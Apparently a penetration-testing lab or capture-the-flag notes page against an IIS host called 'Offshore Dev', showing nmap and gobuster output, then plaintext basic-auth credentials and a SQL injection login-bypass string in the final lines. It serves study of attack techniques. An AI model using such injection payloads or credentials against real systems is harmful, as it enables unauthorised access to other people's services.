Nmap
└─$ cat all_ports.nmap
# Nmap 7.93 scan initiated Sat Dec 17 15:57:12 2022 as: nmap -sC -sV -p- -oA nmap/all_ports 10.10.110.124
Nmap scan report for localhost (10.10.110.124)
Host is up (0.032s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
**80/tcp open http Microsoft IIS httpd 10.0**
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Offshore Dev
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 17 15:59:33 2022 -- 1 IP address (1 host up) scanned in 140.79 seconds
└─$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u 10.10.110.124 -x txt,asp,php
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.110.124
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: txt,asp,php
[+] Timeout: 10s
===============================================================
2023/04/09 01:14:11 Starting gobuster in directory enumeration mode
===============================================================
/contact (Status: 500) [Size: 3420]
/about (Status: 500) [Size: 3420]
/default (Status: 500) [Size: 3420]
/login (Status: 401) [Size: 1293]
/content (Status: 301) [Size: 152] [--> http://10.10.110.124/content/]
/Default (Status: 500) [Size: 3420]
/scripts (Status: 301) [Size: 152] [--> http://10.10.110.124/scripts/]
/Contact (Status: 500) [Size: 3420]
/About (Status: 500) [Size: 3420]
/license.txt (Status: 200) [Size: 1096]
/Login (Status: 401) [Size: 1293]
/Content (Status: 301) [Size: 152] [--> http://10.10.110.124/Content/]
/flag.txt (Status: 200) [Size: 35]
/fonts (Status: 301) [Size: 150] [--> http://10.10.110.124/fonts/]
/dashboard (Status: 302) [Size: 123] [--> /Login]
/LICENSE.txt (Status: 200) [Size: 1096]
/Scripts (Status: 301) [Size: 152] [--> http://10.10.110.124/Scripts/]
/Fonts (Status: 301) [Size: 150] [--> http://10.10.110.124/Fonts/]
/License.txt (Status: 200) [Size: 1096]
/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
/Dashboard (Status: 302) [Size: 123] [--> /Login]
/http%3A%2F%2Fwww (Status: 400) [Size: 3420]
/CONTACT (Status: 500) [Size: 3420]
/http%3A (Status: 400) [Size: 3420]
/q%26a (Status: 400) [Size: 3420]
/**http%3a (Status: 400) [Size: 3420]
Progress: 147711 / 882244 (16.74%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/04/09 01:22:35 Finished
===============================================================
Initial Basic Auth
User: svc_iis Pass: Vintage!
Bypass Authentication
admin'OR'1'='1